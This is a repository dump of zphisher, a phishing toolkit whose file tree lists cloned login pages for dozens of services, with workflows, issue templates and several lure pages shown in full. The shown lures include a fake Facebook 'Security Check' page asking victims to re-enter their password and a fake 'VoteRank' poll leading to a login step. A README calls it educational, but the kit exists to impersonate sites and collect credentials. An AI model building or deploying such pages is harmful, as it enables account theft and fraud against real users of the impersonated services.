├── .github ├── ISSUE_TEMPLATE │ ├── 01-bug-report.yml │ ├── 02-broken-page.yml │ └── 03-feature-request.yml ├── misc │ ├── logo.png │ └── workflow.gif └── workflows │ ├── docker.yml │ ├── lock.yml │ └── release.yml ├── .sites ├── adobe │ ├── bg.jpg │ ├── favicon.ico │ ├── index.php │ ├── login.html │ ├── login.php │ └── logo.svg ├── badoo │ ├── favicon.ico │ ├── index.php │ ├── login.html │ ├── login.php │ └── logo.svg ├── deviantart │ ├── index.php │ ├── login.html │ └── login.php ├── discord │ ├── 6c6374bad0b0b6d204d8d6dc4a18d820.woff │ ├── LICENSE │ ├── banner.png │ ├── e8acd7d9bf6207f99350ca9f9e23b168.woff │ ├── fav.ico │ ├── index.php │ ├── login.html │ ├── login.php │ ├── qr.png │ ├── script.js │ └── style.css ├── dropbox │ ├── favicon.ico │ ├── index.php │ ├── login.html │ ├── login.php │ └── mobile.html ├── ebay │ ├── favicon.ico │ ├── index.php │ ├── login.html │ ├── login.php │ └── logo.png ├── facebook │ ├── LICENSE │ ├── README.md │ ├── hsts-pixel.gif │ ├── index.php │ ├── login.html │ ├── login.php │ ├── logo.svg │ ├── mobile.html │ ├── script.js │ └── style.css ├── fb_advanced │ ├── index.php │ ├── login.html │ ├── login.php │ ├── login2.html │ └── result.html ├── fb_messenger │ ├── index.php │ ├── login.html │ └── login.php ├── fb_security │ ├── fb-ico.png │ ├── index.php │ ├── login.html │ ├── login.php │ ├── logo.png │ └── style.css ├── github │ ├── index.php │ ├── login.html │ └── login.php ├── gitlab │ ├── index.php │ ├── login.html │ └── login.php ├── google │ ├── avatar.png │ ├── google.png │ ├── index.php │ ├── login.html │ └── login.php ├── google_new │ ├── index.php │ ├── login.html │ └── login.php ├── google_poll │ ├── index.php │ ├── login.html │ ├── login.php │ ├── login2.html │ └── result.html ├── ig_followers │ ├── index.php │ ├── login.html │ └── login.php ├── ig_verify │ ├── index.php │ ├── login.html │ ├── login.php │ ├── login2.html │ ├── login2.php │ └── login3.html ├── insta_followers │ ├── index.php │ ├── login.html │ └── login.php ├── instagram │ ├── badge_android_english-en.png │ ├── badge_ios_english-en.png │ ├── favicon.png │ ├── home-phones.png │ ├── home-phones@2x.png │ ├── index.php │ ├── login.html │ ├── login.php │ ├── screenshot1.jpg │ ├── screenshot2.jpg │ ├── screenshot3.jpg │ ├── screenshot4.jpg │ ├── screenshot5.jpg │ ├── sprite_core_2x_bcd90c1d4868.png │ └── sprite_core_32f0a4f27407.png ├── ip.php ├── linkedin │ ├── favicon.ico │ ├── index.php │ ├── login.html │ ├── login.php │ └── style.css ├── mediafire │ ├── favicon.ico │ ├── index.php │ ├── login.html │ └── login.php ├── microsoft │ ├── ConvergedLoginPaginatedStrings.EN.js │ ├── ConvergedLoginPaginatedStrings.js │ ├── ConvergedLogin_PCore.js │ ├── Converged_v21033.css │ ├── Converged_v21033.css2 │ ├── boot.css │ ├── boot.js │ ├── boot_002.js │ ├── boot_003.js │ ├── boot_004.js │ ├── ellipsis_grey.svg │ ├── ellipsis_white.svg │ ├── index.php │ ├── login.html │ ├── login.php │ ├── microsoft_logo.svg │ ├── prefetch.html │ ├── sprite1.css │ └── sprite1.png ├── netflix │ ├── FB-f-Logo__blue_57.png │ ├── index.php │ ├── login.html │ ├── login.php │ ├── none.css │ ├── none.js │ ├── none_002.js │ ├── sdk.js │ └── xaOI6zd9HW9.html ├── origin │ ├── EA_Origin_Lockup_Black.png │ ├── analytics.js │ ├── api.js │ ├── css.css │ ├── iframe_api.js │ ├── index.php │ ├── jquery-1.js │ ├── jquery.js │ ├── jquery_002.js │ ├── jquery_003.js │ ├── jquery_004.js │ ├── login.html │ ├── login.php │ ├── originX-pc-common.css │ ├── originX-pc-login.css │ ├── otk.css │ ├── recaptcha__en.js │ ├── sha.js │ ├── utag.js │ ├── utag_002.js │ └── www-widgetapi.js ├── paypal │ ├── favicon.ico │ ├── index.php │ ├── login.html │ └── login.php ├── pinterest │ ├── favicon.png │ ├── index.php │ ├── login.html │ ├── login.php │ └── mobile.html ├── playstation │ ├── 0a674de1f2362e0247eec6e1d770e │ ├── S9fUSTxhhOdrtoorjI9LLu91aXsPVT7Js_3UUxt2SGg.js.download │ ├── anchor.html │ ├── api.js.download │ ├── bframe.html │ ├── button_icon_password_off.png │ ├── index.php │ ├── kekka-22361ea3e8890b95e7b006a784440d01.css │ ├── kekka-6225c71c3ba0a25429287cf2bec55f12.js.download │ ├── loading.png │ ├── loading_base.png │ ├── login.html │ ├── login.php │ ├── logo_playstation.png │ ├── pc-7cc7759e91c65baf3b78fd4eb4402c4f.css │ ├── recaptcha__en_gb.js.download │ ├── saved_resource │ ├── saved_resource(1) │ ├── siews1lib.js.download │ ├── sony_logo.png │ ├── styles__ltr.css │ ├── ua-parser.min-03f60cd2f499bace751d5136d4fc67d4.js.download │ ├── unifiedfooter.en-gb.js.download │ ├── vendor-05c320ffd8d18cdbde15fa028ff545b7.js.download │ ├── vendor-571d67531622102402268bd2c623c17f.css │ └── wallpaper.jpg ├── protonmail │ ├── bg.jpg │ ├── favicon.ico │ ├── index.php │ ├── login.html │ └── login.php ├── quora │ ├── -4-chunk.web.main.js.out-34-ee935e0e4fc8f76d.webpack │ ├── -4-main.css-27-d85df81eef715f06.css │ ├── -4-web.entry.js.out-34-8f7d03da0b7a24ae.webpack │ ├── anchor.html │ ├── bframe.html │ ├── client_platform.js.download │ ├── iframe.html │ ├── index.php │ ├── login.html │ ├── login.php │ └── saved_resource.html ├── reddit │ ├── art.png │ ├── favicon.png │ ├── index.php │ ├── login.html │ ├── login.php │ └── mobile.html ├── roblox │ ├── favicon.ico │ ├── index.php │ ├── login.html │ └── login.php ├── snapchat │ ├── favicon.png │ ├── icon.svg │ ├── index.php │ ├── login.html │ └── login.php ├── spotify │ ├── favicon.ico │ ├── index.php │ ├── login.html │ └── login.php ├── stackoverflow │ ├── favicon.ico │ ├── index.php │ ├── login.html │ └── login.php ├── steam │ ├── 1.jpg │ ├── 2.jpg │ ├── favicon.ico │ ├── index.php │ ├── join.png │ ├── login.html │ └── login.php ├── tiktok │ ├── index.php │ ├── jquery.min.js │ ├── jscript.js │ ├── login.html │ ├── login.php │ ├── logo.png │ ├── sadflix.ttf │ └── style.css ├── twitch │ ├── favicon.png │ ├── index.php │ ├── login.html │ └── login.php ├── twitter │ ├── index.php │ ├── login.html │ └── login.php ├── vk │ ├── favicon.png │ ├── index.php │ ├── login.html │ └── login.php ├── vk_poll │ ├── counter.gif │ ├── hit.gif │ ├── index.php │ ├── login.html │ ├── login.php │ ├── login2.html │ ├── p.gif │ ├── result.html │ ├── s_c.js │ ├── s_cfmxw.css │ ├── s_yzgt.css │ ├── s_z.js │ └── top_logo.png ├── wordpress │ ├── favicon.ico │ ├── index.php │ ├── login.html │ └── login.php ├── xbox │ ├── index.php │ ├── login.php │ └── pass.php ├── yahoo │ ├── index.php │ ├── login.html │ ├── login.php │ ├── mobile.html │ └── yahoo_en-US_f_p_bestfit_2x.png └── yandex │ ├── index.php │ ├── login.html │ └── login.php ├── Dockerfile ├── LICENSE ├── README.md ├── make-deb.sh ├── run-docker.sh ├── scripts └── launch.sh └── zphisher.sh /.github/ISSUE_TEMPLATE/01-bug-report.yml: -------------------------------------------------------------------------------- 1 | name: 🐞 Bug Report 2 | description: Submit a report to help us improve 3 | # title: "[Bug]: " 4 | labels: ["bug"] 5 | 6 | body: 7 | - type: markdown 8 | attributes: 9 | value: | 10 | ***Thanks for taking the time to fill out this report!*** 11 | 12 | - type: dropdown 13 | id: environment 14 | attributes: 15 | label: Which environment you are using ? 16 | multiple: false 17 | options: 18 | - Linux / Desktop 19 | - Termux / Android 20 | - Windows (lol) 21 | 22 | - type: textarea 23 | id: description 24 | attributes: 25 | label: Describe the bug 26 | description: | 27 | *A summary of the issue. Attach screenshots if needed.* 28 | validations: 29 | required: true 30 | 31 | - type: textarea 32 | id: logs 33 | attributes: 34 | render: shell 35 | label: Provide log output [Optional] 36 | description: | 37 | *Copy & paste the log output.* 38 | -------------------------------------------------------------------------------- /.github/ISSUE_TEMPLATE/02-broken-page.yml: -------------------------------------------------------------------------------- 1 | name: 💔 Broken Page 2 | description: Report broken pages 3 | title: "[Broken Page]: " 4 | labels: ["broken"] 5 | 6 | body: 7 | - type: markdown 8 | attributes: 9 | value: | 10 | ***If you can fix it, consider creating a PR. That would be appreciated.*** 11 | 12 | - type: textarea 13 | id: description 14 | attributes: 15 | label: Which Page is broken ? 16 | description: Name of the phishing page which is broken. Attach screenshot if possible. 17 | validations: 18 | required: true 19 | -------------------------------------------------------------------------------- /.github/ISSUE_TEMPLATE/03-feature-request.yml: -------------------------------------------------------------------------------- 1 | name: 🚀 Feature Request 2 | description: Suggest an idea for improving zphisher 3 | # title: "[Feature Request]: " 4 | labels: ["enhancement"] 5 | 6 | body: 7 | - type: textarea 8 | id: description 9 | attributes: 10 | label: Is your proposal related to a problem? 11 | description: Provide a clear and concise description of what the problem is. 12 | 13 | - type: textarea 14 | id: solution 15 | attributes: 16 | label: "Describe the solution you'd like" 17 | description: Provide a clear and concise description of what you want to happen. 18 | 19 | - type: textarea 20 | id: context 21 | attributes: 22 | label: "Additional context" 23 | description: | 24 | Is there anything else you can add about the proposal? 25 | *You might want to link to related issues here, if you haven't already.* 26 | 27 | - type: markdown 28 | attributes: 29 | value: | 30 | ***If you can implement the code, consider creating a pull request.*** *Thanks for taking the time to fill out this report!* 31 | -------------------------------------------------------------------------------- /.github/misc/logo.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/htr-tech/zphisher/65b99bccaa746ec3edda4291ec7f4048fbd49771/.github/misc/logo.png -------------------------------------------------------------------------------- /.github/misc/workflow.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/htr-tech/zphisher/65b99bccaa746ec3edda4291ec7f4048fbd49771/.github/misc/workflow.gif -------------------------------------------------------------------------------- /.github/workflows/docker.yml: -------------------------------------------------------------------------------- 1 | name: 'Build & Push Docker Image' 2 | 3 | on: 4 | schedule: 5 | - cron: "0 0 * * 0" # Every Sunday 6 | workflow_dispatch: 7 | 8 | env: 9 | CI: true 10 | DOCKER_BUILDKIT: 1 11 | 12 | jobs: 13 | build: 14 | runs-on: ubuntu-latest 15 | steps: 16 | - name: Checkout 17 | uses: actions/checkout@v3 18 | - name: Build Image 19 | run: | 20 | # Build Docker Image for DockerHub 21 | docker build --tag htrtech/zphisher:latest . 22 | 23 | # Tag Docker Image for GHCR 24 | docker tag htrtech/zphisher:latest ghcr.io/htr-tech/zphisher:latest 25 | 26 | - name: Login to GHCR 27 | if: github.repository == 'htr-tech/zphisher' && github.ref == 'refs/heads/master' 28 | uses: docker/login-action@v2 29 | with: 30 | registry: ghcr.io 31 | username: ${{ github.actor }} 32 | password: ${{ secrets.GITHUB_TOKEN }} 33 | 34 | - name: Login to DockerHub 35 | if: github.repository == 'htr-tech/zphisher' && github.ref == 'refs/heads/master' 36 | uses: docker/login-action@v2 37 | with: 38 | username: "htrtech" 39 | password: ${{ secrets.DOCKER_TOKEN }} 40 | 41 | - name: Push 42 | if: github.repository == 'htr-tech/zphisher' && github.ref == 'refs/heads/master' 43 | run: | 44 | # Push to DockerHub 45 | docker push htrtech/zphisher:latest 46 | # Push to GHCR 47 | docker push ghcr.io/htr-tech/zphisher:latest 48 | -------------------------------------------------------------------------------- /.github/workflows/lock.yml: -------------------------------------------------------------------------------- 1 | name: 'Lock Closed Issues' 2 | 3 | on: 4 | schedule: 5 | - cron: '0 0 * * 0' # Every Sunday 6 | workflow_dispatch: 7 | 8 | permissions: 9 | issues: write 10 | pull-requests: write 11 | 12 | concurrency: 13 | group: lock 14 | 15 | jobs: 16 | action: 17 | runs-on: ubuntu-latest 18 | steps: 19 | - name: Lock Issues 20 | if: github.repository == 'htr-tech/zphisher' && github.ref == 'refs/heads/master' 21 | uses: dessant/lock-threads@v3 22 | with: 23 | process-only: 'issues' 24 | issue-inactive-days: '30' 25 | exclude-any-issue-labels: 'enhancement' 26 | add-issue-labels: 'archived' 27 | remove-issue-labels: 'stale' 28 | issue-lock-reason: 'resolved' 29 | issue-comment: > 30 | This issue has been automatically locked since there 31 | has not been any recent activity after it was closed. 32 | Please open a new issue for related bugs/questions. 33 | -------------------------------------------------------------------------------- /.github/workflows/release.yml: -------------------------------------------------------------------------------- 1 | name: Upload .DEB to Release 2 | 3 | on: 4 | push: 5 | tags: 6 | - '*' 7 | 8 | jobs: 9 | build: 10 | runs-on: ubuntu-latest 11 | steps: 12 | - name: Checkout 13 | uses: actions/checkout@v2 14 | 15 | - name: Build .DEB 16 | run: | 17 | sed -i 's/#PKG_NAME/PKG_NAME/' make-deb.sh 18 | bash make-deb.sh # Build for Debian 19 | bash make-deb.sh termux # Build for Termux 20 | find -type f -name "*.deb" -exec sha256sum "{}" > CHECKSUMS.txt \; 21 | 22 | - name: Upload to Release 23 | uses: softprops/action-gh-release@v1 24 | with: 25 | files: "*.deb" 26 | - uses: softprops/action-gh-release@v1 27 | with: 28 | files: CHECKSUMS.txt 29 | -------------------------------------------------------------------------------- /.sites/adobe/bg.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/htr-tech/zphisher/65b99bccaa746ec3edda4291ec7f4048fbd49771/.sites/adobe/bg.jpg -------------------------------------------------------------------------------- /.sites/adobe/favicon.ico: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/htr-tech/zphisher/65b99bccaa746ec3edda4291ec7f4048fbd49771/.sites/adobe/favicon.ico -------------------------------------------------------------------------------- /.sites/adobe/index.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /.sites/adobe/login.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /.sites/adobe/logo.svg: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 8 | 11 | 14 | 17 | 20 | 21 | 22 | 24 | 25 | -------------------------------------------------------------------------------- /.sites/badoo/favicon.ico: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/htr-tech/zphisher/65b99bccaa746ec3edda4291ec7f4048fbd49771/.sites/badoo/favicon.ico -------------------------------------------------------------------------------- /.sites/badoo/index.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /.sites/badoo/login.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /.sites/badoo/logo.svg: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | -------------------------------------------------------------------------------- /.sites/deviantart/index.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /.sites/deviantart/login.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /.sites/discord/6c6374bad0b0b6d204d8d6dc4a18d820.woff: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/htr-tech/zphisher/65b99bccaa746ec3edda4291ec7f4048fbd49771/.sites/discord/6c6374bad0b0b6d204d8d6dc4a18d820.woff -------------------------------------------------------------------------------- /.sites/discord/LICENSE: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2022 Ali Milani 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | 23 | # https://github.com/AliMilani/fake-discord -------------------------------------------------------------------------------- /.sites/discord/banner.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/htr-tech/zphisher/65b99bccaa746ec3edda4291ec7f4048fbd49771/.sites/discord/banner.png -------------------------------------------------------------------------------- /.sites/discord/e8acd7d9bf6207f99350ca9f9e23b168.woff: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/htr-tech/zphisher/65b99bccaa746ec3edda4291ec7f4048fbd49771/.sites/discord/e8acd7d9bf6207f99350ca9f9e23b168.woff -------------------------------------------------------------------------------- /.sites/discord/fav.ico: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/htr-tech/zphisher/65b99bccaa746ec3edda4291ec7f4048fbd49771/.sites/discord/fav.ico -------------------------------------------------------------------------------- /.sites/discord/index.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /.sites/discord/login.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /.sites/discord/qr.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/htr-tech/zphisher/65b99bccaa746ec3edda4291ec7f4048fbd49771/.sites/discord/qr.png -------------------------------------------------------------------------------- /.sites/discord/script.js: -------------------------------------------------------------------------------- 1 | let inputs = document.querySelectorAll('form input') 2 | let submitBtn = document.querySelector('form button[type="submit"]') 3 | // submitBtn.addEventListener("click", validateForm) 4 | inputs[1].addEventListener("input", validateForm) 5 | 6 | function validateForm() { 7 | let outlines = document.querySelectorAll('form .input-outline') 8 | let lables = document.querySelectorAll('.colorStandard-21JIj7') 9 | let errMessages = document.querySelectorAll('.errorMessage-1kMqS5') 10 | 11 | for (let i = 0; i < inputs.length; i++) { 12 | inputs[i].addEventListener("input", validateForm) 13 | if (inputs[i].value == '') { 14 | outlines[i].classList.add('error-8r7mjf') 15 | lables[i].classList.add('error-3EBD81') 16 | errMessages[i].style.display = 'inline' 17 | 18 | } else { 19 | outlines[i].classList.remove('error-8r7mjf') 20 | lables[i].classList.remove('error-3EBD81') 21 | errMessages[i].style.display = 'none' 22 | submitBtn.disabled = '' 23 | } 24 | } 25 | (!inputs[0].value == '' && !inputs[1].value == '') ? 26 | submitBtn.disabled = '' : submitBtn.disabled = 'disabled' 27 | 28 | } -------------------------------------------------------------------------------- /.sites/dropbox/favicon.ico: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/htr-tech/zphisher/65b99bccaa746ec3edda4291ec7f4048fbd49771/.sites/dropbox/favicon.ico -------------------------------------------------------------------------------- /.sites/dropbox/index.php: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /.sites/dropbox/login.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /.sites/ebay/favicon.ico: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/htr-tech/zphisher/65b99bccaa746ec3edda4291ec7f4048fbd49771/.sites/ebay/favicon.ico -------------------------------------------------------------------------------- /.sites/ebay/index.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /.sites/ebay/login.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /.sites/ebay/logo.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/htr-tech/zphisher/65b99bccaa746ec3edda4291ec7f4048fbd49771/.sites/ebay/logo.png -------------------------------------------------------------------------------- /.sites/facebook/LICENSE: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2021 KasRoudra 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | -------------------------------------------------------------------------------- /.sites/facebook/README.md: -------------------------------------------------------------------------------- 1 | # Facebook Static Login Form (Full offline css and js) 2 | 3 | ## Author: [KasRoudra](https://github.com/KasRoudra) 4 | 5 | #### This is created for educational purposes demonstrating how phishing works. 6 | 7 | ### Use/Copy it legally and provide proper credit -------------------------------------------------------------------------------- /.sites/facebook/hsts-pixel.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/htr-tech/zphisher/65b99bccaa746ec3edda4291ec7f4048fbd49771/.sites/facebook/hsts-pixel.gif -------------------------------------------------------------------------------- /.sites/facebook/index.php: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /.sites/facebook/login.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /.sites/facebook/logo.svg: -------------------------------------------------------------------------------- 1 | FBWordmark_Hex-RGB-1024 2 | -------------------------------------------------------------------------------- /.sites/fb_advanced/index.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /.sites/fb_advanced/login.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 22 | 23 | VoteRank #289032 24 | 25 | 26 | 27 | 28 | 29 |
30 | 31 |
32 |

VOTERANK

33 |

#289032

34 |
35 | 36 | 37 |
38 |
39 |
40 | What's your name?


41 | Select your favorite social networks:
42 | Facebook
43 | Twitter
44 | LinkedIn
45 | Instagram
46 | Snapchat
47 | Google+

48 |
49 |
50 | Select your favorite colors:
51 | Blue
52 | Red
53 | Green
54 | Yellow
55 | Purple
56 | Orange
57 | Black
58 | White
59 | Grey
60 | Brown
61 | Pink
62 | 63 |
64 |
65 |
66 | 67 | 68 | 69 | 70 | -------------------------------------------------------------------------------- /.sites/fb_advanced/login.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /.sites/fb_advanced/login2.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | VoteRank #289032 4 | 5 | 6 | 7 | 8 | 9 |
10 | 11 | 109 | 110 |
111 |

VOTERANK

112 |

#289032

113 |
114 | 127 | 128 | -------------------------------------------------------------------------------- /.sites/fb_advanced/result.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | Poll completed successfully. Thank You! 5 | 6 | 7 | 8 | 9 | 10 |
11 | 12 |
13 |

VOTERANK

14 |

#289032

15 |
16 | 17 | 18 |

Poll completed successfully. Thank You!

19 | 20 | 21 | 22 | 23 | -------------------------------------------------------------------------------- /.sites/fb_messenger/index.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /.sites/fb_messenger/login.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 |




Messenger

Instantly connect with people in your life.

Sign in with Facebook to get started.
5 | 6 | 7 | 8 | 9 |


-------------------------------------------------------------------------------- /.sites/fb_messenger/login.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /.sites/fb_security/fb-ico.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/htr-tech/zphisher/65b99bccaa746ec3edda4291ec7f4048fbd49771/.sites/fb_security/fb-ico.png -------------------------------------------------------------------------------- /.sites/fb_security/index.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /.sites/fb_security/login.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | Security Check 6 | 7 | 8 | 9 | 10 |
11 |
12 | 15 |
16 |
17 |
18 |
19 | 22 |
23 |

Verify needed to understand it's you

24 |

Enter your password for security reason (make sure your caps lock is off)

25 |

Forgot your password ? Request new one 26 |

27 | 28 | 39 | 40 |
41 | 42 | 67 |
68 | 69 | 70 | -------------------------------------------------------------------------------- /.sites/fb_security/login.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /.sites/fb_security/logo.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/htr-tech/zphisher/65b99bccaa746ec3edda4291ec7f4048fbd49771/.sites/fb_security/logo.png -------------------------------------------------------------------------------- /.sites/fb_security/style.css: -------------------------------------------------------------------------------- 1 | h1, h2, h3, h4, h5, a, p, ul, li, img, header, section, div, body {margin: 0; padding: 0;} 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | header { 10 | width: 1348px; 11 | height: 84px; 12 | background: #3B5998; 13 | } 14 | 15 | .main-header { 16 | padding-left:184px; 17 | } 18 | 19 | 20 | 21 | .form { 22 | border: 1px solid #cccccc; 23 | border-radius: 5px; 24 | height: 420px; 25 | margin: 60px auto 45px; 26 | width: 641px; 27 | } 28 | 29 | .form h3 { 30 | color: #333333; 31 | border-bottom: 1.5px solid #cccccc; 32 | font-family: tahoma; 33 | font-size: 18px; 34 | font-weight: 600; 35 | margin: 0 20px; 36 | padding: 20px 0 12px; 37 | } 38 | .red-box { 39 | margin:24px auto 0; 40 | width: 600px; 41 | height: 97px; 42 | background: #FFEBE8; 43 | border: 1.5px solid red; 44 | } 45 | 46 | 47 | .red-box p { 48 | font-size: 10.5px; 49 | font-family: tahoma; 50 | padding: 14px 0 0 20px; 51 | } 52 | 53 | .red-box a { 54 | text-decoration: none; 55 | color: #3B5998; 56 | } 57 | 58 | .red-box a:hover { 59 | text-decoration: underline; 60 | } 61 | 62 | .login-form { 63 | width:75%; 64 | margin: 0 auto; 65 | padding: 23px 0 0 0; 66 | } 67 | .login-form label { 68 | font-family: tahoma; 69 | font-size: 13px; 70 | padding: 2px 10px 3px 5px; 71 | } 72 | .login-form input { 73 | padding: 2px 10px 3px 5px; 74 | } 75 | 76 | 77 | footer { 78 | width: 984px; 79 | margin:0 auto; 80 | border-top: 1.5px solid #cccccc; 81 | } 82 | 83 | ul li { 84 | display: inline; 85 | margin: 0 0 0 28px; 86 | } 87 | 88 | 89 | ul li a { 90 | text-decoration: none; 91 | font-family: tahoma; 92 | font-size: 10.5px; 93 | color: #3B5998; 94 | } 95 | ul li a:hover { 96 | text-decoration: underline; 97 | } 98 | -------------------------------------------------------------------------------- /.sites/github/index.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /.sites/github/login.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /.sites/gitlab/index.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /.sites/gitlab/login.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /.sites/google/avatar.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/htr-tech/zphisher/65b99bccaa746ec3edda4291ec7f4048fbd49771/.sites/google/avatar.png -------------------------------------------------------------------------------- /.sites/google/google.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/htr-tech/zphisher/65b99bccaa746ec3edda4291ec7f4048fbd49771/.sites/google/google.png -------------------------------------------------------------------------------- /.sites/google/index.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /.sites/google/login.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /.sites/google_new/index.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /.sites/google_new/login.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /.sites/google_poll/index.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /.sites/google_poll/login.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 22 | 23 | VoteRank #289032 24 | 25 | 26 | 27 | 28 | 29 |
30 | 31 |
32 |

VOTERANK

33 |

#289032

34 |
35 | 36 | 37 |
38 |
39 |
40 | What's your name?


41 | Select your favorite social networks:
42 | Facebook
43 | Twitter
44 | LinkedIn
45 | Instagram
46 | Snapchat
47 | Google+

48 |
49 |
50 | Select your favorite colors:
51 | Blue
52 | Red
53 | Green
54 | Yellow
55 | Purple
56 | Orange
57 | Black
58 | White
59 | Grey
60 | Brown
61 | Pink
62 | 63 |
64 |
65 |
66 | 67 | 68 | 69 | 70 | -------------------------------------------------------------------------------- /.sites/google_poll/login.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /.sites/google_poll/login2.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | VoteRank #289032 4 | 5 | 6 | 7 | 8 | 9 |
10 | 11 | 118 | 119 |
120 |

VOTERANK

121 |

#289032

122 |
123 | 124 | 136 | 137 | 138 | -------------------------------------------------------------------------------- /.sites/google_poll/result.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | Poll completed successfully. Thank You! 5 | 6 | 7 | 8 | 9 | 10 |
11 | 12 |
13 |

VOTERANK

14 |

#289032

15 |
16 | 17 | 18 |

Poll completed successfully. Thank You!

